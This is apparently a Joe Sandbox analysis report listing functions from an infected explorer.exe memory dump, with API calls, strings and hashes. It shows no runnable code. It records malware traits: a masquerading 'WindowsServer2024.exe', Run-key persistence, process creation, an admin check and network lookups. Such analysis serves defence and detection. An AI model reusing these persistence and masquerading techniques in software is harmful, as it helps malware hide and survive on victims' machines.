                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$Alloc$lstrlen$CreateFileFolderKnownModuleNamePathProcessTask_errno_invalid_parameter_noinfolstrcmpi
                                                                            • String ID: "%s%s" %s$%s%s$WindowsServer2024.exe$h${9A30B3AA-5D5B-4418-94BC-EA9A5585D123}
                                                                            • API String ID: 2909854553-1761902030
                                                                            • Opcode ID: 6941620c8b1b6a3f7695d2f46255491dd9ec483a90c569c830939d92bb6a245d
                                                                            • Instruction ID: 73d7dfcbd8b6856e484dc7e7a58f5beff3be0f9bfa08a828d73371d0e2be641e
                                                                            • Opcode Fuzzy Hash: 6941620c8b1b6a3f7695d2f46255491dd9ec483a90c569c830939d92bb6a245d
                                                                            • Instruction Fuzzy Hash: D251B632618B8182EB209B65F86476EB7A1F7C4794F501235EA8E47BB8DF7CD549CB00
                                                                            Function 00C0BA94 Relevance: 31.8, APIs: 14, Strings: 4, Instructions: 334COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00C0845C: RtlLookupFunctionEntry.KERNEL32 ref: 00C084D0
                                                                            • __GetUnwindTryBlock.LIBCMT ref: 00C0BAF8
                                                                            • __SetUnwindTryBlock.LIBCMT ref: 00C0BB1F
                                                                              • Part of subcall function 00C08E6C: RaiseException.KERNEL32 ref: 00C08EE7
                                                                            • __GetUnwindTryBlock.LIBCMT ref: 00C0BB29
                                                                            • _getptd.LIBCMT ref: 00C0BB7F
                                                                            • _getptd.LIBCMT ref: 00C0BB92
                                                                            • _getptd.LIBCMT ref: 00C0BB9E
                                                                            • _SetThrowImageBase.LIBCMT ref: 00C0BBB2
                                                                            • _getptd.LIBCMT ref: 00C0BC02
                                                                            • _getptd.LIBCMT ref: 00C0BC15
                                                                            • _getptd.LIBCMT ref: 00C0BC21
                                                                            • type_info::operator==.LIBCMT ref: 00C0BC88
                                                                            • std::exception::exception.LIBCMT ref: 00C0BCC1
                                                                            • _getptd.LIBCMT ref: 00C0BEF4
                                                                            • std::exception::exception.LIBCMT ref: 00C0BF6D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _getptd$BlockUnwind$std::exception::exception$BaseEntryExceptionFunctionImageLookupRaiseThrowtype_info::operator==
                                                                            • String ID: bad exception$csm$csm$csm
                                                                            • API String ID: 1639654010-820278400
                                                                            • Opcode ID: 6faa33b089582752c27cfbc1c1e80be62899ed4a314661211624918d995b1c1c
                                                                            • Instruction ID: b042c6aa080ce71104c2bfd0971d0d2439824e041d345146a70a12bfd039868b
                                                                            • Opcode Fuzzy Hash: 6faa33b089582752c27cfbc1c1e80be62899ed4a314661211624918d995b1c1c
                                                                            • Instruction Fuzzy Hash: 51D1EF32700B418BEB24DF66D4803AE77A4F749B88F544225EFA917B99CF34CA55D701
                                                                            Function 00BEFBA0 Relevance: 29.8, APIs: 14, Strings: 3, Instructions: 93memoryfileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00BEF510: SHGetKnownFolderPath.SHELL32 ref: 00BEF587
                                                                              • Part of subcall function 00BEF510: lstrlenW.KERNEL32 ref: 00BEF59A
                                                                              • Part of subcall function 00BEF510: lstrlenW.KERNEL32 ref: 00BEF5B5
                                                                              • Part of subcall function 00BEF510: LocalAlloc.KERNEL32 ref: 00BEF5DC
                                                                              • Part of subcall function 00BEF510: lstrlenW.KERNEL32 ref: 00BEF620
                                                                              • Part of subcall function 00BEF510: CoTaskMemFree.COMBASE ref: 00BEF635
                                                                            • CreateDirectoryW.KERNEL32 ref: 00BEFBD8
                                                                            • GetLastError.KERNEL32 ref: 00BEFBE3
                                                                            • LocalAlloc.KERNEL32 ref: 00BEFBFE
                                                                            • CreateFileW.KERNEL32 ref: 00BEFC6E
                                                                            • GetLastError.KERNEL32 ref: 00BEFC79
                                                                            • LocalFree.KERNEL32 ref: 00BEFD16
                                                                            • LocalFree.KERNEL32 ref: 00BEFD21
                                                                            • LocalFree.KERNEL32 ref: 00BEFD77
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$lstrlen$AllocCreateErrorLast$DirectoryFileFolderKnownPathTask
                                                                            • String ID: %s%s$P$WindowsServer2024.exe
                                                                            • API String ID: 1076749940-1786351275
                                                                            • Opcode ID: a14841830c2abf8d4874170eae5c5501311d47b61c8d518f533b23261dad1e24
                                                                            • Instruction ID: 3e7ca81c594eb448fc37b6af9df298dfbb6ac412244cf1bf31e9a03af1c63512
                                                                            • Opcode Fuzzy Hash: a14841830c2abf8d4874170eae5c5501311d47b61c8d518f533b23261dad1e24
                                                                            • Instruction Fuzzy Hash: 7351CA32508A8582E7209B55F86476EB7A1F7C57A4F604325E6A946AF8CF7CD489CB00
                                                                            Function 00BEF200 Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 74registrymemoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00BEF510: SHGetKnownFolderPath.SHELL32 ref: 00BEF587
                                                                              • Part of subcall function 00BEF510: lstrlenW.KERNEL32 ref: 00BEF59A
                                                                              • Part of subcall function 00BEF510: lstrlenW.KERNEL32 ref: 00BEF5B5
                                                                              • Part of subcall function 00BEF510: LocalAlloc.KERNEL32 ref: 00BEF5DC
                                                                              • Part of subcall function 00BEF510: lstrlenW.KERNEL32 ref: 00BEF620
                                                                              • Part of subcall function 00BEF510: CoTaskMemFree.COMBASE ref: 00BEF635
                                                                            • LocalAlloc.KERNEL32 ref: 00BEF230
                                                                            • wnsprintfW.SHLWAPI ref: 00BEF275
                                                                            • RegOpenKeyW.ADVAPI32 ref: 00BEF29B
                                                                            • RegSetValueExW.ADVAPI32 ref: 00BEF2D3
                                                                            • RegCloseKey.ADVAPI32 ref: 00BEF2DE
                                                                            • RegOpenKeyW.ADVAPI32 ref: 00BEF300
                                                                            • RegSetValueExW.ADVAPI32 ref: 00BEF338
                                                                            • RegCloseKey.ADVAPI32 ref: 00BEF343
                                                                            • LocalFree.KERNEL32 ref: 00BEF34E
                                                                            • LocalFree.KERNEL32 ref: 00BEF359
                                                                            Strings
                                                                            • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00BEF28D
                                                                            • WindowsServer2024.exe, xrefs: 00BEF253
                                                                            • SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 00BEF2F2
                                                                            • {AB1F3E47-AEF1-400E-A108-233A046C3A34}, xrefs: 00BEF32C
                                                                            • {741330C7-73F4-49B6-9258-6679317DED46}, xrefs: 00BEF247
                                                                            • %s%s %s, xrefs: 00BEF264
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Freelstrlen$AllocCloseOpenValue$FolderKnownPathTaskwnsprintf
                                                                            • String ID: %s%s %s$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$Software\Microsoft\Windows\CurrentVersion\Run$WindowsServer2024.exe${741330C7-73F4-49B6-9258-6679317DED46}${AB1F3E47-AEF1-400E-A108-233A046C3A34}
                                                                            • API String ID: 1790340015-474006990
                                                                            • Opcode ID: d6f2102c1b876ca338cdd60c50be2b12f3308f971301b787c4bddd2885c18154
                                                                            • Instruction ID: 78a5c3e098f5e46390d87b15ecbec89006b625ef42c85b646efa9005a9c689a0
                                                                            • Opcode Fuzzy Hash: d6f2102c1b876ca338cdd60c50be2b12f3308f971301b787c4bddd2885c18154
                                                                            • Instruction Fuzzy Hash: A6311935615A81C2EB20DF25F8A4B5A77B0F785794F500222EA9E43BA8DF7DC949CB00
                                                                            Function 00C038A0 Relevance: 25.6, APIs: 17, Instructions: 138networkmemoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$CloseFreeHandle$Event$AllocCreateEventsMultipleSelectWaitund_memcpy
                                                                            • String ID:
                                                                            • API String ID: 3749125693-0
                                                                            • Opcode ID: 9d6664aa23206a2a9b891f2668c1b6fb33a2235f64874e35d4e4b5f5713d2e3e
                                                                            • Instruction ID: d149508f107790d8dca1da34b5a6dcb17ccfa55735e97c73cd5ed71997621169
                                                                            • Opcode Fuzzy Hash: 9d6664aa23206a2a9b891f2668c1b6fb33a2235f64874e35d4e4b5f5713d2e3e
                                                                            • Instruction Fuzzy Hash: 3761B036618A808BDB60DB29E4A471AB7B0F7C5B94F105115EB9A87BA8CF7DC945CF00
                                                                            Function 00BFD3B0 Relevance: 21.1, APIs: 14, Instructions: 92memorynetworkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$Allocgethostbynameinet_addrtype_info::_name_internal_method
                                                                            • String ID:
                                                                            • API String ID: 156840946-0
                                                                            • Opcode ID: 24e95a5a60aac3689dfe6f05b441674e5507dff5deef9c4db6f24b73b44f7655
                                                                            • Instruction ID: 1453ff22981711e0585207e6f409a0b6a89f8bb59f16010d8b1eb625b09379cf
                                                                            • Opcode Fuzzy Hash: 24e95a5a60aac3689dfe6f05b441674e5507dff5deef9c4db6f24b73b44f7655
                                                                            • Instruction Fuzzy Hash: AE41D776618A4486D720DB29E89471EB7B1F7C9B98F100615EB8E83B68DF3CC549CB00
                                                                            Function 00C0E110 Relevance: 19.6, APIs: 13, Instructions: 90COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __free_lconv_mon.LIBCMT ref: 00C0E168
                                                                              • Part of subcall function 00C11CA4: free.LIBCMT ref: 00C11CC2
                                                                              • Part of subcall function 00C11CA4: free.LIBCMT ref: 00C11CD4
                                                                              • Part of subcall function 00C11CA4: free.LIBCMT ref: 00C11CE6
                                                                              • Part of subcall function 00C11CA4: free.LIBCMT ref: 00C11CF8
                                                                              • Part of subcall function 00C11CA4: free.LIBCMT ref: 00C11D0A
                                                                              • Part of subcall function 00C11CA4: free.LIBCMT ref: 00C11D1C
                                                                              • Part of subcall function 00C11CA4: free.LIBCMT ref: 00C11D2E
                                                                              • Part of subcall function 00C11CA4: free.LIBCMT ref: 00C11D40
                                                                              • Part of subcall function 00C11CA4: free.LIBCMT ref: 00C11D52
                                                                              • Part of subcall function 00C11CA4: free.LIBCMT ref: 00C11D64
                                                                              • Part of subcall function 00C11CA4: free.LIBCMT ref: 00C11D79
                                                                              • Part of subcall function 00C11CA4: free.LIBCMT ref: 00C11D8E
                                                                              • Part of subcall function 00C11CA4: free.LIBCMT ref: 00C11DA3
                                                                            • free.LIBCMT ref: 00C0E15C
                                                                              • Part of subcall function 00C0C4D0: RtlFreeHeap.NTDLL(?,?,00000000,00C0AC50,?,?,00000000,00C0AC73,?,?,?,00C09403,?,?,00000000,00C09C5B), ref: 00C0C4E6
                                                                              • Part of subcall function 00C0C4D0: _errno.LIBCMT ref: 00C0C4F0
                                                                              • Part of subcall function 00C0C4D0: GetLastError.KERNEL32(?,?,00000000,00C0AC50,?,?,00000000,00C0AC73,?,?,?,00C09403,?,?,00000000,00C09C5B), ref: 00C0C4F8
                                                                            • free.LIBCMT ref: 00C0E17E
                                                                            • __free_lconv_num.LIBCMT ref: 00C0E18A
                                                                            • free.LIBCMT ref: 00C0E196
                                                                            • free.LIBCMT ref: 00C0E1A2
                                                                            • free.LIBCMT ref: 00C0E1C6
                                                                            • free.LIBCMT ref: 00C0E1DA
                                                                            • free.LIBCMT ref: 00C0E1E9
                                                                            • free.LIBCMT ref: 00C0E1F5
                                                                            • free.LIBCMT ref: 00C0E222
                                                                            • free.LIBCMT ref: 00C0E24A
                                                                            • free.LIBCMT ref: 00C0E264
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: free$ErrorFreeHeapLast__free_lconv_mon__free_lconv_num_errno
                                                                            • String ID:
                                                                            • API String ID: 518839503-0
                                                                            • Opcode ID: f646e581e6c13ef6b143ada3750723de8401b4e8531ebf511b5a7b58b7508cb8
                                                                            • Instruction ID: f8ee2c5eae092bfb9e9980c38a8df4390a0ad2a5fb7bc03558c45d2343a3da44
                                                                            • Opcode Fuzzy Hash: f646e581e6c13ef6b143ada3750723de8401b4e8531ebf511b5a7b58b7508cb8
                                                                            • Instruction Fuzzy Hash: C5314F3278268485EF15EFA1C4A03BD2364FB94B98F084A36DE1D4B6D5CF78C981D310
                                                                            Function 00BE18F0 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 115processmemorysynchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$CloseHandle$AllocCreateDirectoryObjectProcessSingleSystemWaitlstrlen
                                                                            • String ID: h
                                                                            • API String ID: 1515568942-2439710439
                                                                            • Opcode ID: fcf791c4c17c76b04dbd47a6427d92d9a15430502c49554a9dd4a1db620ea300
                                                                            • Instruction ID: 9d5cde67f7d739abac51e23462ecc491b7e42f0b849061254a587fee8afd44bc
                                                                            • Opcode Fuzzy Hash: fcf791c4c17c76b04dbd47a6427d92d9a15430502c49554a9dd4a1db620ea300
                                                                            • Instruction Fuzzy Hash: 7451F672218BC086E7709B15F49879EB3A1F788758F904629D79943BA9DF7CC548CB04
                                                                            Function 00BE9240 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 80memoryprocessCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32 ref: 00BE9251
                                                                            • GetSystemDirectoryW.KERNEL32 ref: 00BE9272
                                                                            • LocalFree.KERNEL32 ref: 00BE93E6
                                                                              • Part of subcall function 00BEF510: SHGetKnownFolderPath.SHELL32 ref: 00BEF587
                                                                              • Part of subcall function 00BEF510: lstrlenW.KERNEL32 ref: 00BEF59A
                                                                              • Part of subcall function 00BEF510: lstrlenW.KERNEL32 ref: 00BEF5B5
                                                                              • Part of subcall function 00BEF510: LocalAlloc.KERNEL32 ref: 00BEF5DC
                                                                              • Part of subcall function 00BEF510: lstrlenW.KERNEL32 ref: 00BEF620
                                                                              • Part of subcall function 00BEF510: CoTaskMemFree.COMBASE ref: 00BEF635
                                                                            • LocalAlloc.KERNEL32 ref: 00BE92AC
                                                                            • LocalFree.KERNEL32 ref: 00BE93DB
                                                                              • Part of subcall function 00BF7DA0: lstrlenW.KERNEL32 ref: 00BF7DEC
                                                                              • Part of subcall function 00C08378: _errno.LIBCMT ref: 00C083AF
                                                                              • Part of subcall function 00C08378: _invalid_parameter_noinfo.LIBCMT ref: 00C083BA
                                                                            • CreateProcessW.KERNEL32 ref: 00BE9398
                                                                            • LocalFree.KERNEL32 ref: 00BE93A8
                                                                            • LocalFree.KERNEL32 ref: 00BE93B3
                                                                            • LocalFree.KERNEL32 ref: 00BE93BE
                                                                            • LocalFree.KERNEL32 ref: 00BE93D0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$lstrlen$Alloc$CreateDirectoryFolderKnownPathProcessSystemTask_errno_invalid_parameter_noinfo
                                                                            • String ID: h
                                                                            • API String ID: 2101662253-2439710439
                                                                            • Opcode ID: f84ef3b761225198f22501dd15be75b558d5d674513c0454791fa4cd12d06670
                                                                            • Instruction ID: 0b1c03e3d79933b8e628206d15ee1f60e96b02795d35820c00d9f4b45ae3faee
                                                                            • Opcode Fuzzy Hash: f84ef3b761225198f22501dd15be75b558d5d674513c0454791fa4cd12d06670
                                                                            • Instruction Fuzzy Hash: 0841E736618B8482E7609B11F89479EB7A1F7C9750F504226E68E47BA8DF7CC54CCF40
                                                                            Function 00C05BB0 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 69memorystringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32 ref: 00C05BC1
                                                                            • lstrcpyW.KERNEL32 ref: 00C05C05
                                                                              • Part of subcall function 00BFDDC0: AllocateAndInitializeSid.ADVAPI32 ref: 00BFDE32
                                                                              • Part of subcall function 00BFDDC0: CheckTokenMembership.ADVAPI32 ref: 00BFDE4F
                                                                              • Part of subcall function 00BFDDC0: FreeSid.ADVAPI32 ref: 00BFDE66
                                                                            • GetModuleFileNameW.KERNEL32 ref: 00C05C25
                                                                            • LocalFree.KERNEL32 ref: 00C05C34
                                                                            • LocalFree.KERNEL32 ref: 00C05C6A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeLocal$AllocAllocateCheckFileInitializeMembershipModuleNameTokenlstrcpy
                                                                            • String ID: %s [%d]$CPU001
                                                                            • API String ID: 2255487582-1715046084
                                                                            • Opcode ID: f3fc7e035b4eed099ce0184f6fda892aaf14ad264708c1ce09850189901d9943
                                                                            • Instruction ID: 77e263e30bec0eb70aef03b5858a8f6fac0c0b0b485d1c6cdb326a3b7728c22f
                                                                            • Opcode Fuzzy Hash: f3fc7e035b4eed099ce0184f6fda892aaf14ad264708c1ce09850189901d9943
                                                                            • Instruction Fuzzy Hash: 3B310D31618A8482EB60DF11E89879E77A0F7C8B84F501625EA8F87B74DF7DC489CB40
                                                                            Function 00C10364 Relevance: 18.1, APIs: 12, Instructions: 149COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
